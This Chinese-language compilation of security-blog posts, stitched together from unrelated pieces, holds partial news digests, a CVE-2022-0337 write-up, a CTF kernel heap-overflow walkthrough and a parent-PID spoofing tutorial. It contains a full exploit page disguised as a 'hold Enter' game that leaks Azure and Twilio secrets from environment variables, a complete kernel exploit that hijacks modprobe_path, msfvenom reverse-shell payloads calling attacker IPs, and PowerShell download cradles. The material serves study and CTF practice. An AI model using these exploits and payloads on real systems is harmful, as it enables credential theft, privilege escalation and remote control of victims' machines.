https://www.securityweek.com/several-critical-vulnerabilities-affect-smartppt-smartics-industrial-products 7、在被关闭一年多后Emotet恶意软件正在卷土重来 https://www.theregister.com/2022/04/21/emotet-resurgence-email/ 8、网络犯罪分子冒充政府供应商进行IRS税务诈骗 https://securityaffairs.co/wordpress/130451/cyber-crime/cybercriminals-deliver-irs-tax-scams-phishing.html 9、里约热内卢财政部门遭到LockBit勒索软件攻击 https://therecord.media/rio-de-janeiro-finance-department-hit-with-lockbit-ransomware/ 10、Killnet黑客组织对捷克多个实体发起DDoS攻击 https://www.govinfosecurity.com/conti-ransomware-targets-costa-rican-government-entities-a-18939

前言 　前两天在刷tw，看到了个比较有意思的一个CVE漏洞，价值奖励是10000美刀，比较好奇的是价值10000美刀的漏洞是什么样子的，漏洞利用就是需要在浏览器中进行用户交互才能触发该漏洞，但由于 Windows 的文件保存默认为接受，通过使用强制您按 ENTER 约 2 秒的技巧简单地泄漏数十个环境变量。 　影响版本 Google Chrome版本范围92.x-96.x Microsoft Edge版本范围92.x-96.x Opera版本范围78.x-81.x 　复现 　在存在漏洞的浏览器F12的控制台输入payload let a = await window.showSaveFilePicker({suggestedName:'%username%'});a.name; 　但是必须要访问一个存在的html，百度首页测试 　保存后控制台输出环境变量username的值 　漏洞发现者为：Maciej Pulikowski，exp也是来自于作者，中间改了点样式，因为觉得有点不太美观！ 　EXP <html>  <head>    <title>     CVE-2022-0337 System environment variables leak on Google Chrome,     Microsoft Edge and Opera    </title>    <meta charset="UTF-8" />  </head>  <style>    body {      background: rgba(212,0,0,0.2);      display: flex;      justify-content: center;      align-items: center;      flex-direction: column;   } h1, h2, h3 {  -webkit-text-stroke: 1px #00000050; } h1 {  color: #d96c06;  font-size: 36px; } h2 {  color: #1ebe8e;  font-size: 46px; } h3 {  color: #c6f91f;  font-size: 18px; } h2 span {  color: #cf4848;  font-size: 70px; } #author {  font-size: 28px; } span {  font-weight: 100; } </style>  <body>    <script>      //how many time enter clicked in row      let countEnter = 0;      //is file downloaded      let isDownloaded = false;      //on page load      window.onload = function () {        const body = document.querySelector("body");        const pixel = document.querySelector("#pixel");        body.onkeydown = (e) => (e.key == "Enter" ? clickedEnter() : 1);        body.onkeyup = (e) => (e.key == "Enter" ? cancelEnter() : 1);        const randomNumber = Math.floor(Math.random() * 990) + 1;        const filename = `f${randomNumber}.f`;        //List of environment variables that hacker is interested in.        const environmentVariables = [          "USERNAME",          "USERDOMAIN",          "SESSIONNAME",          "COMPUTERNAME",          "KEY_VAULT_URL",          "SECRET_NAME",          "AZURE_TENANT_ID",          "AZURE_CLIENT_ID",          "AZURE_CLIENT_SECRET",          "TWILIO_ACCOUNT_SID",          "TWILIO_AUTH_TOKEN",          //'TOKEN',          //'PASSWORD'       ];        const suggestedName =          environmentVariables.map((x) => `%${x}%`).join("@") + filename;        pixel.addEventListener("click", async () => {          //handle to get file          const handle = await window.showSaveFilePicker({ suggestedName });          //sometimes can throw an exception because file name is too big, but we can create more handles and put each 4 environmentVariables to deal with that problem          //result from user          const username = handle.name.split("@")[0];          const userInfo = handle.name           .replaceAll(filename, "")           .split("@")           .map(             (x, i) =>                `${environmentVariables[i]} = ${x.includes("%") ? "null" : x}`           )           .join("<br>");          const guessWinPath = `C:/Users/${username}`;          document.querySelector(            "#userInfo"         ).innerHTML = `USER'S ENVIRONMENT VARIABLES: <br>${userInfo} <br> guessWinPath = C:/users/${username}`;          document.querySelector("#gameover").textContent =            "GAME OVER - Need refresh to start again";       });     };      function clickedEnter() {        countEnter++;        //if button was hold more then 1 second and it wasn't downloaded - we can change !isDownloaded to countEnter % 30 === 0 to download many files        if (countEnter > 5 && !isDownloaded) {          pixel.click();          //set file is downloaded          isDownloaded = true;       }     }      function cancelEnter() {        //reset count enter if enter is not hold        countEnter = 0;     }    </script>    <!-- div used to click to open Save As dialog -->    <div id="pixel"></div>    <h3 id="userInfo"></h3>    <h1>Super Simple Game<span>******</span></h1>    <h2><span>**HOLD ENTER</span> for 2 seconds</h2>    <h3 id="gameover"></h3>  </body> </html> 　这里选择版本 92.0.4515.159（正式版本） 　刷新页面后长按Enter键两秒即可触发payload 　分析 　分一下payload前面的49行之前内容是定义了html的样式，核心内容在 <script>      //how many time enter clicked in row      let countEnter = 0;      //is file downloaded      let isDownloaded = false; //on page load  window.onload = function () {    const body = document.querySelector("body");    const pixel = document.querySelector("#pixel");    body.onkeydown = (e) => (e.key == "Enter" ? clickedEnter() : 1);    body.onkeyup = (e) => (e.key == "Enter" ? cancelEnter() : 1);    const randomNumber = Math.floor(Math.random() * 990) + 1;    const filename = `f${randomNumber}.f`;    //List of environment variables that hacker is interested in.    const environmentVariables = [      "USERNAME",      "USERDOMAIN",      "SESSIONNAME",      "COMPUTERNAME",      "KEY_VAULT_URL",      "SECRET_NAME",      "AZURE_TENANT_ID",      "AZURE_CLIENT_ID",      "AZURE_CLIENT_SECRET",      "TWILIO_ACCOUNT_SID",      "TWILIO_AUTH_TOKEN",      //'TOKEN',      //'PASSWORD'   ];    const suggestedName =      environmentVariables.map((x) => `%${x}%`).join("@") + filename;    pixel.addEventListener("click", async () => {      //handle to get file      const handle = await window.showSaveFilePicker({ suggestedName });      //sometimes can throw an exception because file name is too big, but we can create more handles and put each 4 environmentVariables to deal with that problem      //result from user      const username = handle.name.split("@")[0];      const userInfo = handle.name       .replaceAll(filename, "")       .split("@")       .map(         (x, i) =>            `${environmentVariables[i]} = ${x.includes("%") ? "null" : x}`       )       .join("<br>");      const guessWinPath = `C:/Users/${username}`;      document.querySelector(        "#userInfo"     ).innerHTML = `USER'S ENVIRONMENT VARIABLES: <br>${userInfo} <br> guessWinPath = C:/users/${username}`;      document.querySelector("#gameover").textContent =        "GAME OVER - Need refresh to start again";   }); };  function clickedEnter() {    countEnter++;    //if button was hold more then 1 second and it wasn't downloaded - we can change !isDownloaded to countEnter % 30 === 0 to download many files    if (countEnter > 5 && !isDownloaded) {      pixel.click();      //set file is downloaded      isDownloaded = true;   } }  function cancelEnter() {    //reset count enter if enter is not hold    countEnter = 0; } </script> 　看标签的话定义为JavaScript语言，泄露的配置信息在69-84行定义 　在63和64行定义了长按Enter键相当于触发script标签 　随机数生成文件名后缀，随机数大小为0到991，fimename=随机数.f suggestedName格式为定义的%{x}%@filename即 suggestedName=%{x}%@随机数.f 　继续向下看 　上述代码为触发事件操作，定义了所泄露的在environmentVariables中定义的属性，且调用属性suggestedName做打印。 　所以最终在执行payload的时候保存的文件名为 %USERNAME%@%USERDOMAIN%@%SESSIONNAME%@%COMPUTERNAME%@%KEY_VAULT_URL%@%SECRET_NAME%@%AZURE_TENANT_ID%@%AZURE_CLIENT_ID%@%AZURE_CLIENT_SECRET%@%TWILIO_ACCOUNT_SID%@%TWILIO_AUTH_TOKEN%@%TOKEN%@%PASSWORD%f416.f 　那么接下来需要思考两个问题 泄露的漏洞触发的原理又在哪里 能做什么呢？ 　1.根据测试，漏洞在windwos易受攻击。Linux 和Mac 是安全的，因为在命名的时候使用了ENV环境变量，所以会触发，在 Windows 中，%ENV_VAR%可以使用 来引用环境变量，文件名称的命名时利用环境变量来命名的话，在调用文件的话会返回环境变量的值。 　2.因为windows中能够利用环境变量有很多，例如 AWS_SECRET_ACCESS_KEY AZURE_CLIENT_SECRET binance_secret GITHUB_TOKEN GOOGLE_API_KEY 　结语 　大佬毕竟是大佬呀！！！

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、Pwn2Own Miami 2022 为参赛者提供了40万美元奖金 https://www.securityweek.com/ics-exploits-earn-hackers-400000-pwn2own-miami-2022 2、Drupal 修复了访问绕过、数据覆盖漏洞 https://www.securityweek.com/access-bypass-data-overwrite-vulnerabilities-patched-drupal 3、FBI 分享了有关 BlackCat 勒索软件的IOC信息 https://www.securityweek.com/fbi-shares-information-blackcat-ransomware-attacks 4、新的 BotenaGo 变种用 Mirai 感染 Lilin 摄像头 https://www.securityweek.com/new-botenago-variant-infects-lilin-security-cameras-mirai 5、思科修复了Cisco Umbrella 虚拟设备中的一个高危漏洞 https://securityaffairs.co/wordpress/130443/hacking/cisco-umbrella-default-ssh-key.html 6、高通和联发科芯片ALAC解码器严重RCE漏洞影响全球2/3的安卓设备 https://securityaffairs.co/wordpress/130459/hacking/critical-bug-popular-chipsets-android-hack.html 7、Lazarus APT 使用 TraderTraitor 恶意软件攻击加密货币公司 https://cyware.com/news/lazarus-apt-uses-tradertraitor-malware-to-target-cryptocurrency-organizations-b4c1eb47 8、加拿大航空公司Sunwing Airlines Inc遭到黑客攻击 https://www.infosecurity-magazine.com/news/cyberattackers-hit-sunwing-airlines/ 9、RainLoop邮件客户端的漏洞可以让黑客访问所有电子邮件 https://thehackernews.com/2022/04/unpatched-bug-in-rainloop-webmail-could.html 10、思科修补了 NSA 报告的虚拟会议软件漏洞 https://www.securityweek.com/cisco-patches-virtual-conference-software-vulnerability-reported-nsa

一、前言 　在如今的CTF比赛大环境下，掌握glibc堆内存分配已经成为了大家的必修课程。然而在内核态中，堆内存的分配策略发生了变化。笔者会在介绍内核堆利用方式之前先简单的介绍一下自己了解的内核内存分配策略，如有不对的地方欢迎师傅们指正。 　二、前置知识 　在Linux系统中通过分段与分页机制将物理内存划分成4kb大小的内存页，而涉及到内存分配不可避免的就会产生外部碎片与内部碎片问题，这个在物理页中也是一样的，为了避免这种情况内核管理物理页采用了两个策略：buddy system与slub算法。 　伙伴系统（buddy system）以页为单位对内存进行管理，将相同大小的连续物理页以链表形式进行管理，物理页就像手拉手的好伙伴一样，这就是伙伴系统名字的由来。所有的空闲页以11个链表进行管理(2^n)，而系统申请的内存大小总是能在伙伴系统中找到合适的范围，可以避免因为分配次数过多而产生外部碎片的情况。 　当内核申请内存时，伙伴系统以页为单位进行分配，而内核在很多情况下并不需要一整页的内存空间，往往只需要很小的内存空间，而这也就造成了内部碎片的产生，而slub算法正是为了满足系统申请小内存的需求。 　slub算法从伙伴系统申请空闲的内存页即slab，slab是由一个或多个内存页构成（一般为单页）。并把这个slab划分为一个个object，并将这些object组成一个单向链表进行管理，这里需要注意slub系统把内存块当成object看待，而不是伙伴系统中的页。当系统申请小内存时slub算法会根据kmem_cache_cpu中slab是否存在空闲object来进行操作： 　1、kmem_cache_cpu中的slab存在空闲object，则直接分配object。 　2、kmem_cache_cpu中的slab不存在空闲object，则会将全部分配的slab加入到kmem_cache_node的full链中，并从partial链中取出一个部分分配的slab，分配object给系统。 　3、kmem_cache_cpu中的slab不存在空闲object且kmem_cache_node中也不存在半空闲的object，则会将全部分配的slab加入到kmem_cache_node的full链中，并向伙伴系统申请新的空闲页，分配object给系统。 　三、漏洞演示 　在前置知识中我们简单的介绍了内核内存分配策略，并且我们不难发现slub算法的管理方式与glibc中fastbin链类似，都是单链表形式管理，所以当内核存在堆溢出漏洞时我们完全可以通过修改其fd指针将我们想要进行写入的内存地址加入到freelist中。利用思路不算很难但是在实际利用中往往会因为环境中的一些随机性而增加利用的难度。 　本次选择演示的例题是2019-SUCTF的sudrv例题，查看start.sh中的信息可以发现开启了kaslr保护与smep保护。 #! /bin/sh qemu-system-x86_64 \ -m 128M \ -kernel ./bzImage \ -initrd ./rootfs.cpio \ -append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 kaslr" \ -monitor /dev/null \ -nographic 2>/dev/null \ -smp cores=2,threads=1 \ -s \ -cpu kvm64,+smep 　ida反编译程序，查看sudrv_ioctl函数内容。 　可以看出ioctl中实现了三种功能，具体如下所示： 0x73311337 --> 申请堆块 0xDEADBEEF --> 调用sudrv_ioctl_cold_2函数 0x13377331 --> 释放堆块 　其中sudrv_ioctl_cold_2函数的内容如下所示，发现其调用printk函数，格式化参数存于se_buf中，因题目环境未做出限制故我们可以通过dmesg命令查看printk函数的输出。 void __fastcall sudrv_ioctl_cold_2(__int64 se_buf, __int64 a2) { printk(se_buf, a2); JUMPOUT(0x38LL); } 　模块中定义了sudrv_write函数，这个函数中使用的copy_user_generic_unrolled未对输入长度进行检测，存在堆溢出，并且su_buf作为printk函数中格式化字符串参数的位置，同时存在格式化字符串漏洞。 __int64 sudrv_write() { if ( copy_user_generic_unrolled(su_buf) )   return -1LL; else   return sudrv_write_cold_1(); } 　找到了漏洞点以后我们就可以构思利用思路了，结合我们之前学到的内核利用知识不难想到大体的利用思路框架 找到漏洞点 --> 绕过保护 --> 提权 --> 返回用户态获取rootshell 　KASLR保护我们可以通过修改start.sh的kaslr为nokaslr暂时关闭保护，利用格式化漏洞泄露出地址后计算出相应偏移即可绕过KASLR保护。 　SMEP保护即内核态禁止执行用户态代码，我们可以通过BYPASS_SMEP修改cr4寄存器的值关闭SMEP保护，再通过swapgs和iretq完成用户态的跳转即可获取到rootshell。 　而关于如何劫持程序控制流，我们在前置知识中了解到了内核内存分配机制，并且在本题中存在堆溢出漏洞。我们可以通过格式化字符串泄露出栈地址并利用堆溢出漏洞覆盖掉在freelist中空间堆块的fd指针为栈地址，这样我们再申请堆内存即可申请到栈地址上，覆盖函数返回地址为我们布置的ropchain即可劫持程序流。 　整体的利用思路就是这样，但是内核环境往往伴随着随机性，经常会出现的一种情况就是在freelist的空闲object并不是按照地址顺序进行排列的，这也就造成了往往我们通过堆溢出覆盖在freelist中object的fd指针。 预期期望堆溢出前： se_buf -地址连续-> 空闲object -(fd)-> 空闲object 预期期望堆溢出后： se_buf -地址连续-> 空闲object -(覆盖fd指针)-> 栈地址 +------------------------------------------------+ 实际环境中可能出现的情况： se_buf -地址不连续-> 空闲object -(fd)-> 空闲object #因虚拟地址不连续，故无法通过溢出覆盖掉freelist中object的fd指针。 　通过gdb远程动调我们可以看到内核内存的变化情况，在执行完kmalloc函数的时候观察rax中freelist的情况。 　可以看到0x2f000结尾的object为我们通过kmalloc申请到的地址，然而其指向的下一个object地址并不是0x30000而是以0x2b000结尾，也就是说freelist中的内存地址会因为内核函数的调用而产生消耗，从而影响我们的布局利用。 　即使我们成功劫持了程序流执行了ropchain，也会出现在提权时发生内核错误从而重启的情况。所以我们再利用本题的时候选择换一种思路，将原先的栈地址换成modprob_path地址加入到freelist链表中。在这里简单介绍一下为什么我们要劫持这个地址。 　当内核执行一个错误的文件或未知文件类型的时候，就会调用modprob_path所指向的程序，如果我们修改他所指向的程序为我们自己写的一个sh文件，并利用system或execve函数去执行一个位置类型的文件，那么在发生错误的时候就会以root权限执行我们自己写的sh文件中的内容。 　我们可以在自己的exp中通过system函数创建一个sh文件将root权限下的flag文件拷贝到tmp目录下并赋予777的权限。   system("echo -ne '#!/bin/sh\n/bin/cp /Flag/flag /tmp/flag\n/bin/chmod 777 /tmp/flag' > /tmp/getflag.sh");   system("chmod +x /tmp/getflag.sh");   system("echo -ne '\\xff\\xff\\xff\\xff' > /tmp/fl");   system("chmod +x /tmp/fl"); 　modprob_path的地址并不能从/proc/kallsyms中找到地址，不过我们可以通过其他函数对于modprob_path的引用找到它的地址。在/proc/kallsyms中查找__request_module函数地址，然后在gdb中查看函数的汇编信息，就可以找到modprob_path的地址。 　我们在sudrv_write函数处下断点，然后在调用copy_user_generic_unrolled时可以发现其rdi指向的正是我们的modprob_path地址，rsi中为我们要写入的字符串。 　ni继续往下走，发现已经成功写入。 　完整EXP如下所示： #include <string.h> #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <pthread.h> #include <fcntl.h> #include <sys/stat.h> #include <sys/types.h> #include <sys/ioctl.h> #define KMALLOC 0x73311337 #define PRINTK 0xDEADBEEF #define KFREE   0x13377331 unsigned long long int user_cs, user_ss, user_rflags, user_sp; unsigned long long int raw_kernel_addr = 0xffffffff811c827f; void main() {   unsigned long long int kernel_addr = 0;   unsigned long long int overflow[0x201] = {0};   int fd = open("/dev/meizijiutql", O_WRONLY);   char tmp_str[0x30];   system("echo -ne '#!/bin/sh\n/bin/cp /Flag/flag /tmp/flag\n/bin/chmod 777 /tmp/flag' > /tmp/getflag.sh");   system("chmod +x /tmp/getflag.sh");   system("echo -ne '\\xff\\xff\\xff\\xff' > /tmp/fl");   system("chmod +x /tmp/fl");   ioctl(fd, KMALLOC, 0xff0);   ioctl(fd, KMALLOC, 0xff0);   ioctl(fd, KMALLOC, 0xff0);   char *str = "%llx %llx %llx %llx %llx kernel: %llx %llx %llx %llx stack: %llx %llx";   write(fd, str, strlen(str));   // full printk buffer   ioctl(fd, PRINTK);   ioctl(fd, PRINTK);   system("dmesg |grep kernel | grep stack | cut -b 42-58 | head -1 > tmp.txt");   int fd_tmp = open("./tmp.txt", 2);   read(fd_tmp, tmp_str, sizeof(tmp_str));   sscanf(tmp_str, "%llx", &kernel_addr);       unsigned long long int offset = kernel_addr - raw_kernel_addr;   unsigned long long int modprob_path = 0xffffffff82242320 + offset;   printf("modprob_path: 0x%llx \n", modprob_path);   // // heap overflow   overflow[0x200] = modprob_path;   ioctl(fd, KMALLOC, 0xff0);   write(fd, overflow, sizeof(overflow));   ioctl(fd, KMALLOC, 0xff0);   write(fd, "/tmp/getflag.sh", 0x10);   ioctl(fd, KMALLOC, 0xff0);   write(fd, "/tmp/getflag.sh", 0x10);   ioctl(fd, KMALLOC, 0xff0);   write(fd, "/tmp/getflag.sh", 0x10);   system("/tmp/fl");   system("cat /tmp/flag"); } 　四、总结 　修改modprob_path中的字符串指向我们创建的sh文件的利用办法在有任意地址写入的时候是非常简洁有效的，相较于ROP需要先bypass然后再提权返回用户态相比不仅简练而且成功率要更高，而本文中仅仅是对内核内存分配策略进行了一些简单的概念性描述，而想要学的更加深入的师傅这边还是推荐再阅读完本篇文章后再去自主了解一些内核内存分配所涉及的关键代码，相信在学习的过程中你一定会有所收获的。

概述 　父进程欺骗是一种访问令牌操作技术，通过将恶意文件的PPID指定为explorer.exe等合法进程的PPID，可帮助攻击者规避启发式检测等防御技术。 　该欺骗可通过使用本地API调用来执行，该调用可帮助攻击者显式指定PID，如C++中的CreateProcess调用。正如我们将在本文中看到的那样，这种显式分配也可能具有某些附带好处。 　MITRE 战术：权限提升（TA0004）和 防御规避（TA0005） 　MITRE ATT&CK技术：T1134 ：Windows访问令牌模拟窃取以及利用 　子技术：T1134.004 ：访问令牌操作： 父 PID 欺骗 　背景： 　子进程监控是威胁狩猎中最常见的指标之一。应急响应人员可能会分析如果 conhost.exe 或 cmd.exe 进程是从 Adobe Reader 或 MS Excel 等零相关的应用生成的，则表明可能存在潜在威胁。安全防护软件会在启发式检测下监控此行为，并向管理员发出警报。 　父PID(PPID)欺骗方法可以绕过 AV/EDR检测，使其认为是 lsass.exe 这样的合法进程在进行活动。它通过欺骗进程的 PID 以匹配其父进程的 PID 来做到这一点。这种方法可能带来的另一个好处是，如果父进程以 SYSTEM 权限运行，则可以凭借访问令牌的继承，使其子进程也具有相同的 SYSTEM 权限。 　进程、PID和PPID 　进程：在 Windows 中，应用程序由一个或多个进程组成。简单来说，当前正在运行的程序的一部分称为进程。不同的应用程序可能会使用相同的进程(如cmd.exe)，并且为避免歧义，会分配一个整数来区分一个进程和另一个进程。该整数称为PID。 　PID：代表进程标识符 (PID)，它是正在运行的进程的数字表示。 Windows 中通过 GetCurrentProcessID() 函数返回指定进程的 PID。 　父进程：父进程是可以派生多个子进程的进程。例如，命令explorer.exe /e,/root,"C：\WINDOWS\System32\cmd.exe"将派生cmd.exe作为父进程explorer.exe的子进程。在代码中，父进程可以使用fork()系统调用来派生子进程。 　PPID：代表父进程标识符(PPID)，它是提供给父进程的数字表示形式。任何包含子进程的进程都存在父子关系。 　方法一（使用C++程序进行PID欺骗） 　Didier Stevens最初在这里的帖子中谈到了Windows API——"CreateProcess"这种方法。还发布了一个用C++编写的利用程序(SelectMyParent）。代码可以在这里下载：https://web.archive.org/web/20210225035252/http:/www.didierstevens.com/files/software/SelectMyParent_v0_0_0_1.zip 请注意，如果您使用的是更高版本的Visual Studio，可能需要重新生成此EXE。在Visual Studio2022中，我删除了Debug and Release文件夹中的SelectMyParent.pdb文件，并重新生成了项目以使其运行。 　在进程管理器中，你会看到 explorer.exe 在 PID 1624 上运行 　因此，要在这个父 explorer.exe进程下运行我们自己的二进制文件，可以像这样使用 SelectMyParent.exe，你会看到在 PID 1624下创建了一个新进程。 E:\>SelectMyParent.exe notepad 1624 　可以看到在PID 2836启动了notepad.exe 　同样，我们也可以运行自己的EXE。让我们先用msfvenom创建一个可以反弹shell的exe # msfvenom -p windows/shell_reverse_tcp -f exe LHOST=172.19.218.248 LPORT=7777 > shell.exe 　在受感染端，使用tasklist /v查看进程运行详情。 　在列表中，可以看到explorer.exe进程以test身份在进程ID 1624上运行。 　然后运行生成的shell.exe，并附属在explorer.exe的PID下 　监听端收到的shell便是explorer.exe进程用户的权限 　如果利用具有system权限的进程，即可进行提权。 　方法二（使用Powershell DLL注入进行PID欺骗） 　F-Secure 实验室利用 powershell 创建了替代上述Didier 二进制文件的方案。它也可以用于父进程欺骗，与上述方法不同之处在于，可以将带有注入的DLL的子进程派生为子进程，功能更强大。代码可以在这里下载https://github.com/countercept/ppid-spoofing，首先在受害者机器上查看进程ID，这里我们选择 Powershell 的 PID 24092 作为父进程ID。 　利用msfvenmon生成要注入的DLL msfvenom -p windows/x64/shell_reverse_tcp exitfunc=thread LHOST=172.27.115.207 LPORT=7777 -f dll > shell.dll [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 460 bytes Final size of dll file: 8704 bytes 　然后进行注入： Import-Module .\PPID-Spoof.ps1 PPID-Spoof -ppid 24092 -spawnto "C:\Windows\System32\notepad.exe" -dllpath .\shell.dll 　可以看到注入的DLL在Notepad.exe中加载执行了。 　通过这种方式，PPID 24092上的powershell.exe进程派生了一个带有插入代码(由DLL提供)的notepad.exe。 　方法三（使用Powershell 脚本入进行PID欺骗） 　Decoder-it 根据 Didier Stevens 提供的指南开发了一个 powershell 脚本，使用了 CreateProcessFromParent()方法，可以在此处找到的psgetsystem脚本:https://github.com/decoder-it/psgetsystem.git，可用于通过PID欺骗派生子进程。首先我们查看所需进程的 PID。这里以lsass.exe为例 　然后执行如下命令： powershell -ep bypass Import-Module .\psgetsys.ps1 [MyProcess]::CreateProcessFromParent(520,".\shell.exe","") 　如果报错，可能是UAC的问题，需要先绕过UAC，或者是权限过低，需要提权。 　绕过UAC脚本可以在这里找到：https://github.com/samratashok/nishang/tree/master/Escalation 　然后下载所需的文件，然后执行命令 $client=new-object System.Net.WebClient $client.DownloadFile("http://<url>/psgetsys.ps1",".\psgetsys.ps1") $client.DownloadFile("http://<url>/shell.exe",".\shell.exe") Import-Module .\psgetsys.ps1 [MyProcess]::CreateProcessFromParent(520,".\shell.exe","") 　可以看到在lsass.exe下成功创建了子进程，因为lsass.exe是system权限，所以反弹shell也获取到了system权限。 　方法四（使用C#程序进行PID欺骗） 　py7hagoras开发了GetSystem项目，是上述技术的C#实现，可以在这里找到：https://github.com/py7hagoras/GetSystem.git 　在目标机上下载GetSystem.exe，然后执行GetSystem.exe 自定义程序 -O 目标进程名 GetSystem.exe shell.exe -O lsass 　注意：这里可能也需要绕过UAC或者提权，不然执行不成功。 　方法五（通过PID欺骗注入Shellcode） 　Chirag Savla 使用 C#开发了一个名为“ProcessInjection”的出色工具，它可以执行许多功能，包括通过 PID 欺骗进行的进程注入。通过提供有效的 PID，该工具会尝试使用 CreateProcess 等原生 API调用来欺骗 PID，然后将代码注入其中。该工具支持 hex、C 和 base64 格式的shellcode ，也可以选择 DLL 注入。工具在这里下载：https://github.com/3xpl01tc0d3r/ProcessInjection 　首先，使用msfvenom创建一个shellcode代码 msfvenom -p windows/x64/shell_reverse_tcp -exitfunc=thread LHOST=172.19.218.248 LPORT=7777 -f hex > /hex.txt 　然后在目标机中下载 　使用ProcessInjection.exe进行注入 ProcessInjection.exe /ppath:"C:\Windows\System32\calc.exe" /path:"hex.txt" /parentproc:explorer /f:hex /t:1 　参数说明： 　/ppath：目标 EXE 的进程路径（需要注入进程的路径） 　/path：shellcode文件路径 　/parentproc：父进程名称，目标EXE应在此进程下生成 　/f：shellcode文件类型 　/t：注入技术 支持的五种注入方式： 1) Vanilla Process Injection 2) DLL Injection 3) Process Hollowing 4) APC Queue 5) Dynamic Invoke - Vanilla Process Injection 　我们可以看到calc.exe在explorer.exe下，而shellcode则在calc.exe中执行。 　也可以进行DLL注入 ProcessInjection.exe /ppath:"C:\Windows\System32\calc.exe" /path:"shell.dll" /parentproc:explorer /t:2 　其他工具 　https://github.com/Mr-Un1k0d3r/RemoteProcessInjection 　https://github.com/xpn/getsystem-offline 　https://github.com/hlldz/APC-PPID 　https://github.com/ewilded/PPID_spoof 　https://github.com/christophetd/spoofing-office-macro （VBA实现） 　在Metasploit中Meterpreter 可以使用migrate命令或者后渗透模块post/windows/manage/migrate也可以实现进程迁移。 　总结 　攻击者广泛使用该技术进行检测规避，并增加了应急响应人员检测IoC的时间。针对许多过时的和未打补丁的EDR解决方案，可以使用此技术轻松规避检测。通过本文，告诉大家在组织中应该使用最新的EDR解决方案以及在可以捕捉此类技术的优质产品中使用智能检测功能的重要性。